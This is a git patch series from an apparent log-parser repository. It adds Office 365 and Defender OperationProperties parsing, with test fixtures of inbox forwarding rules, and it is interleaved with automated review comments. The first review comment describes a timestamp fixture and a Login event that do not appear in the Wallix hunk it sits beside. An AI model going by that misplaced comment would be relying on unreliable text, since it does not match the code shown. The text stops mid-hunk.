No newline at end of file diff --git a/Wallix/wallix-bastion/tests/session_integrity.json b/Wallix/wallix-bastion/tests/session_integrity.json index 39e8a6363..1c01481e9 100644 --- a/Wallix/wallix-bastion/tests/session_integrity.json +++ b/Wallix/wallix-bastion/tests/session_integrity.json @@ -6,13 +6,19 @@ "message": "[sessionintegrity] session_uid=\"1830c403be7caf0c00505688c380\" status=\"failed\" type=\"SSH_SHELL_SESSION\" user=\"adm@CORP.NET@1.1.1.1\" target=\"domain@local@target01.corp.net:SSH_1\" begin=\"2022-08-19 11:31:17\" end=\"2022-08-19 11:32:50\" files=[/var/wab/remote/recorded/ssh/2022-08-19/182b5714b466cba10050568e16d9,adm@CORP.NET@1.1.1.1,domain@target01.corp.net,20220819-113117,foo-bastion-bar.corp.net,1805.ttyrec]", "event": { "action": "SSH_SHELL_SESSION", - "category": ["session"], + "category": [ + "session" + ], "dataset": "session_integrity", "outcome": "failure", - "type": ["info"] + "type": [ + "info" + ] }, "related": { - "user": ["adm@CORP.NET@1.1.1.1"] + "user": [ + "adm@CORP.NET@1.1.1.1" + ] }, "user": { "name": "adm@CORP.NET@1.1.1.1" @@ -21,4 +27,4 @@ "type": "SSH_SHELL_SESSION" } } -} +} \ No newline at end of file From 8ae4ab6122886eb074acbfd38cfba1780259d7f1 Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Tue, 12 Nov 2024 13:21:11 +0200 Subject: [PATCH 023/150] rollback other --- Wallix/wallix-bastion/tests/session_integrity.json | 14 ++++---------- 1 file changed, 4 insertions(+), 10 deletions(-) diff --git a/Wallix/wallix-bastion/tests/session_integrity.json b/Wallix/wallix-bastion/tests/session_integrity.json index 1c01481e9..39e8a6363 100644 --- a/Wallix/wallix-bastion/tests/session_integrity.json +++ b/Wallix/wallix-bastion/tests/session_integrity.json 
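Review bot: The expected `@timestamp` of `2034-02-21T02:43:24.464103Z` is almost ten years after the event's own `TIMESTAMP_DERIVED` (`2024-10-26T04:46:41.024Z`), so this fixture pins a wrong value rather than documenting correct behaviour. The offset looks like `TIMESTAMP` (`20241026044641.024`, a `yyyyMMddHHmmss.SSS` string) being interpreted as an epoch number, which cannot be confirmed from this hunk because the timestamp stage lives in `parser.yml` outside the patch. A wrong `@timestamp` on a Login event silently breaks time-based correlation and retention, so fix the derivation (preferring `TIMESTAMP_DERIVED` when present) and change the fixture to expect the instant in `TIMESTAMP_DERIVED`, i.e. `"@timestamp": "2024-10-26T04:46:41.024Z"` in whatever precision the pipeline emits.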
@@ -6,19 +6,13 @@ "message": "[sessionintegrity] session_uid=\"1830c403be7caf0c00505688c380\" status=\"failed\" type=\"SSH_SHELL_SESSION\" user=\"adm@CORP.NET@1.1.1.1\" target=\"domain@local@target01.corp.net:SSH_1\" begin=\"2022-08-19 11:31:17\" end=\"2022-08-19 11:32:50\" files=[/var/wab/remote/recorded/ssh/2022-08-19/182b5714b466cba10050568e16d9,adm@CORP.NET@1.1.1.1,domain@target01.corp.net,20220819-113117,foo-bastion-bar.corp.net,1805.ttyrec]", "event": { "action": "SSH_SHELL_SESSION", - "category": [ - "session" - ], + "category": ["session"], "dataset": "session_integrity", "outcome": "failure", - "type": [ - "info" - ] + "type": ["info"] }, "related": { - "user": [ - "adm@CORP.NET@1.1.1.1" - ] + "user": ["adm@CORP.NET@1.1.1.1"] }, "user": { "name": "adm@CORP.NET@1.1.1.1" @@ -27,4 +21,4 @@ "type": "SSH_SHELL_SESSION" } } -} \ No newline at end of file +} From 7de6200578c1e1cf707f61343f99b60d962cdf82 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 12 Nov 2024 16:54:59 +0100 Subject: [PATCH 024/150] [Improvement] microsoft 365 / office 365 logs : Addition of operation properties --- .vscode/settings.json | 22 +++++ .../microsoft-365-defender/_meta/fields.yml | 5 + .../microsoft-365-defender/ingest/parser.yml | 15 +++ .../tests/test_cloud_app3.json | 6 ++ Office 365/o365/_meta/fields.yml | 6 ++ Office 365/o365/ingest/parser.yml | 15 +++ Office 365/o365/tests/clientipadress.json | 6 ++ .../o365/tests/exchange_item_aggregated.json | 6 ++ .../o365/tests/operation_properties_01.json | 91 +++++++++++++++++++ .../o365/tests/operation_properties_02.json | 88 ++++++++++++++++++ 10 files changed, 260 insertions(+) create mode 100644 .vscode/settings.json create mode 100644 Office 365/o365/tests/operation_properties_01.json create mode 100644 Office 365/o365/tests/operation_properties_02.json diff --git a/.vscode/settings.json b/.vscode/settings.json new file mode 100644 index 000000000..b92839d53 --- /dev/null +++ b/.vscode/settings.json 
@@ -0,0 +1,22 @@ +{ + "workbench.colorCustomizations": { + "activityBar.activeBackground": "#65c89b", + "activityBar.background": "#65c89b", + "activityBar.foreground": "#15202b", + "activityBar.inactiveForeground": "#15202b99", + "activityBarBadge.background": "#945bc4", + "activityBarBadge.foreground": "#e7e7e7", + "commandCenter.border": "#15202b99", + "sash.hoverBorder": "#65c89b", + "statusBar.background": "#42b883", + "statusBar.foreground": "#15202b", + "statusBarItem.hoverBackground": "#359268", + "statusBarItem.remoteBackground": "#42b883", + "statusBarItem.remoteForeground": "#15202b", + "titleBar.activeBackground": "#42b883", + "titleBar.activeForeground": "#15202b", + "titleBar.inactiveBackground": "#42b88399", + "titleBar.inactiveForeground": "#15202b99" + }, + "peacock.color": "#42b883" +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml index 3a95175de..f69ef372d 100644 --- a/Microsoft/microsoft-365-defender/_meta/fields.yml +++ b/Microsoft/microsoft-365-defender/_meta/fields.yml @@ -777,6 +777,11 @@ microsoft.defender.observer.interface.type: name: microsoft.defender.observer.interface.type type: keyword +microsoft.defender.operation.properties: + description: Additional properties of the operation + name: microsoft.defender.operation.properties + type: object + microsoft.defender.report.id: description: Unique identifier for the event name: microsoft.defender.report.id diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index f22b21ce1..39d179145 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml 
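Review bot: `.vscode/settings.json` is a personal editor configuration (Peacock workbench colour overrides) unrelated to the Microsoft 365 parser change this commit describes, and appears to have been staged by accident. Editor files committed to a shared integration repository impose one contributor's preferences on everyone and add noise to every future diff. Drop the file from the commit and add `.vscode/` to `.gitignore` so it cannot recur.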
@@ -259,6 +259,21 @@ stages: - set: network.protocol: "{{json_event.message.properties.RequestProtocol or json_event.message.properties.Protocol}}" filter: '{{json_event.message.properties.get("RequestProtocol") != None or (json_event.message.properties.get("Protocol") != None and json_event.message.properties.Protocol != "Negotiate")}}' + - set: + microsoft.defender.operation.properties: > + { + {%- for property in json_event.message.properties.RawEventData.OperationProperties -%} + {%- if property.Value != null -%} + {%- if property.Value | from_json == None -%} + "{{property.Name}}":"{{property.Value}}", + {%- else -%} + "{{property.Name}}": {{property.Value | from_json}}, + {%- endif -%} + {%- endif -%} + {%- endfor -%} + } + filter: '{{json_event.message.properties.RawEventData.get("OperationProperties") != None}}' + set_alert_evidence_fields: actions: - set: diff --git a/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json b/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json index d60cc39a1..764942b33 100644 --- a/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json +++ b/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json @@ -84,6 +84,12 @@ ], "type": "Run" }, + "operation": { + "properties": { + "IsThrottled": "False", + "MailAccessType": "Bind" + } + }, "report": { "id": "98261974_20893_f747c19c-0664-45c8-aac9-8f16e7714de1" } diff --git a/Office 365/o365/_meta/fields.yml b/Office 365/o365/_meta/fields.yml index 96bb48e86..190ce038e 100644 --- a/Office 365/o365/_meta/fields.yml +++ b/Office 365/o365/_meta/fields.yml @@ -408,6 +408,12 @@ office365.logon_error: name: office365.logon_error type: keyword + +office365.operation.properties: + description: A list of objects describing the operation + name: office365.operation.properties + type: object + office365.record_type: description: The type of the operation name: office365.record_type 
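Review bot: The object is rendered by string interpolation, and neither `property.Name` nor the string branch `"{{property.Name}}":"{{property.Value}}",` escapes its value, so any property containing a double quote or backslash yields an unparsable document; `RuleName` and `RuleCondition` are user-controlled text on exactly the inbox-rule events this field exists to expose, so a forwarding rule with a `"` in its name would make `microsoft.defender.operation.properties` unusable for detection. Every entry also ends with `,`, including the last, which only works if the consumer tolerates trailing commas. If the engine exposes Jinja's built-in `tojson`, render both branches with it — `{{property.Name | tojson}}: {{property.Value | tojson}},` for plain strings and `{{property.Name | tojson}}: {{property.Value | from_json | tojson}},` otherwise — and join the entries rather than emitting a trailing comma. The same template is duplicated verbatim in the Office 365 parser, so fix both together or factor it out.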
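Review bot: The description `A list of objects describing the operation` contradicts the declared `type: object` and the parser, which emits one mapping keyed by each property's `Name` (the fixtures show `RuleId`, `RuleActions` and so on as keys). Reword it to `Mapping of OperationProperties keyed by property name; values are the raw string or, where the string parses as JSON, the decoded value`.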
diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml index 62a4098df..879592c7b 100644 --- a/Office 365/o365/ingest/parser.yml +++ b/Office 365/o365/ingest/parser.yml @@ -118,6 +118,21 @@ stages: office365.audit.object_id: "{{json_event.message.ObjectId}}" office365.virus_info: "{{json_event.message.VirusInfo}}" office365.virus_vendor: "{{json_event.message.VirusVendor}}" + - set: + office365.operation.properties: > + { + {%- for property in json_event.message.OperationProperties -%} + {%- if property.Value != null -%} + {%- if property.Value | from_json == None -%} + "{{property.Name}}":"{{property.Value}}", + {%- else -%} + "{{property.Name}}": {{property.Value | from_json}}, + {%- endif -%} + {%- endif -%} + {%- endfor -%} + } + filter: '{{json_event.message.get("OperationProperties") != None}}' + - translate: dictionary: 0: "Regular" diff --git a/Office 365/o365/tests/clientipadress.json b/Office 365/o365/tests/clientipadress.json index c20107759..8555c1c9d 100644 --- a/Office 365/o365/tests/clientipadress.json +++ b/Office 365/o365/tests/clientipadress.json @@ -23,6 +23,12 @@ "target": "user" }, "office365": { + "operation": { + "properties": { + "IsThrottled": "False", + "MailAccessType": "Bind" + } + }, "record_type": 50, "result_status": "Succeeded", "user_type": { diff --git a/Office 365/o365/tests/exchange_item_aggregated.json b/Office 365/o365/tests/exchange_item_aggregated.json index 11cbfdefc..c15d8da5b 100644 --- a/Office 365/o365/tests/exchange_item_aggregated.json +++ b/Office 365/o365/tests/exchange_item_aggregated.json @@ -20,6 +20,12 @@ "context": { "aad_session_id": "dcdad6b2-f279-48c6-9ed8-3df0ffde4ece" }, + "operation": { + "properties": { + "IsThrottled": "False", + "MailAccessType": "Bind" + } + }, "record_type": 50, "result_status": "Succeeded", "user_type": { 
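Review bot: The guard `{%- if property.Value != null -%}` compares against a name `null` that stock Jinja2 does not define (its literal is `none`); the `RuleName` entry without a `Value` in the fixtures is skipped only because an undefined attribute compares equal to the undefined `null`, which breaks under a strict-undefined engine or if `null` is ever bound. Write `{%- if property.Value is defined and property.Value is not none -%}` instead. Separately, `from_json` turns numeric-looking strings into numbers — the fixtures expect `RuleId` as `-123` and `4561233110666051585`, the latter above 2^53 and therefore rounded by any consumer that parses JSON into doubles — and the same key becomes a string on one event and a number or boolean on the next, which dynamic indexers can reject as a mapping conflict. Decode only values that yield a list or mapping, e.g. `{%- set parsed = property.Value | from_json -%}` followed by `{%- if parsed is mapping or (parsed is iterable and parsed is not string) -%}`, and keep every scalar as its original string.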
diff --git a/Office 365/o365/tests/operation_properties_01.json b/Office 365/o365/tests/operation_properties_01.json new file mode 100644 index 000000000..8354f4415 --- /dev/null +++ b/Office 365/o365/tests/operation_properties_01.json 
@@ -0,0 +1,91 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 / Office 365", + "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99" + } + }, + "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}" + }, + "expected": { + "message": 
"{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", + "event": { + "action": "UpdateInboxRules", + "category": [ + "email", + "file" + ], + "code": "2", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-28T10:34:13Z", + "action": { + "id": 2, + "name": "UpdateInboxRules", + "outcome": "success", + "target": "user" + 
}, + "office365": { + "context": { + "aad_session_id": "xxxx-xxx-xxx-xxxx" + }, + "exchange": { + "mailbox_guid": "xxxx-xxx-xxx-xxxx" + }, + "operation": { + "properties": { + "RuleActions": [ + { + "ActionType": "Forward", + "ForwardFlags": "None", + "Recipients": [ + "john.doe@mail.fr", + "user@email.fr", + "asmithee@mailbox.fr", + "user.name@mail.fr" + ] + } + ], + "RuleCondition": "{(Exists(ItemClass))}", + "RuleId": -123, + "RuleOperation": "ModifyMailboxRule", + "RuleProvider": "RuleOrganizer", + "RuleState": "Enabled" + } + }, + "record_type": 2, + "result_status": "Succeeded", + "user_type": { + "code": 0, + "name": "Regular" + } + }, + "organization": { + "id": "xxxx-xxx-xxx-xxxx" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe@mail.fr" + ] + }, + "service": { + "name": "Exchange" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "john.doe@mail.fr", + "id": "S-1-2-3-4", + "name": "john.doe@mail.fr" + } + } +} \ No newline at end of file diff --git a/Office 365/o365/tests/operation_properties_02.json b/Office 365/o365/tests/operation_properties_02.json new file mode 100644 index 000000000..7f11fadc3 --- /dev/null +++ b/Office 365/o365/tests/operation_properties_02.json 
@@ -0,0 +1,88 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 / Office 365", + "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99" + } + }, + "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}" + }, + "expected": { + "message": 
"{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", + "event": { + "action": "UpdateInboxRules", + "category": [ + "email", + "file" + ], + "code": "2", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-23T12:26:18Z", + "action": { + "id": 2, + "name": 
"UpdateInboxRules", + "outcome": "success", + "target": "user" + }, + "office365": { + "context": { + "aad_session_id": "xxxx-xxx-xxx-xxxx" + }, + "exchange": { + "mailbox_guid": "xxxx-xxx-xxx-xxxx" + }, + "operation": { + "properties": { + "RuleActions": [ + { + "ActionType": "Forward", + "ForwardFlags": "None", + "Recipients": [ + "user.name@mail.fr" + ] + } + ], + "RuleCondition": "{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}", + "RuleId": 4561233110666051585, + "RuleOperation": "ModifyMailboxRule", + "RuleProvider": "RuleOrganizer", + "RuleState": "Enabled" + } + }, + "record_type": 2, + "result_status": "Succeeded", + "user_type": { + "code": 0, + "name": "Regular" + } + }, + "organization": { + "id": "xxxx-xxx-xxx-xxxx" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe@mail.fr" + ] + }, + "service": { + "name": "Exchange" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "john.doe@mail.fr", + "id": "S-1-2-3", + "name": "john.doe@mail.fr" + } + } +} \ No newline at end of file From a4fd269ed55b824e5c811577722dce79d9611c29 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 12 Nov 2024 16:58:53 +0100 Subject: [PATCH 025/150] fix on linting --- Microsoft/microsoft-365-defender/ingest/parser.yml | 2 +- Office 365/o365/_meta/fields.yml | 1 - Office 365/o365/ingest/parser.yml | 2 +- Office 365/o365/tests/operation_properties_01.json | 4 ++-- Office 365/o365/tests/operation_properties_02.json | 4 ++-- 5 files changed, 6 insertions(+), 7 deletions(-) diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index 39d179145..2a8b6655f 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml 
@@ -273,7 +273,7 @@ stages: {%- endfor -%} } filter: '{{json_event.message.properties.RawEventData.get("OperationProperties") != None}}' - + set_alert_evidence_fields: actions: - set: diff --git a/Office 365/o365/_meta/fields.yml b/Office 365/o365/_meta/fields.yml index 190ce038e..02c13a28b 100644 --- a/Office 365/o365/_meta/fields.yml +++ b/Office 365/o365/_meta/fields.yml @@ -408,7 +408,6 @@ office365.logon_error: name: office365.logon_error type: keyword - office365.operation.properties: description: A list of objects describing the operation name: office365.operation.properties diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml index 879592c7b..b65d6f8e6 100644 --- a/Office 365/o365/ingest/parser.yml +++ b/Office 365/o365/ingest/parser.yml @@ -132,7 +132,7 @@ stages: {%- endfor -%} } filter: '{{json_event.message.get("OperationProperties") != None}}' - + - translate: dictionary: 0: "Regular" diff --git a/Office 365/o365/tests/operation_properties_01.json b/Office 365/o365/tests/operation_properties_01.json index 8354f4415..790c6b45f 100644 --- a/Office 365/o365/tests/operation_properties_01.json +++ b/Office 365/o365/tests/operation_properties_01.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", "sekoiaio": { "intake": { "dialect": "Microsoft 365 / Office 365", "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99" } - }, - "message": 
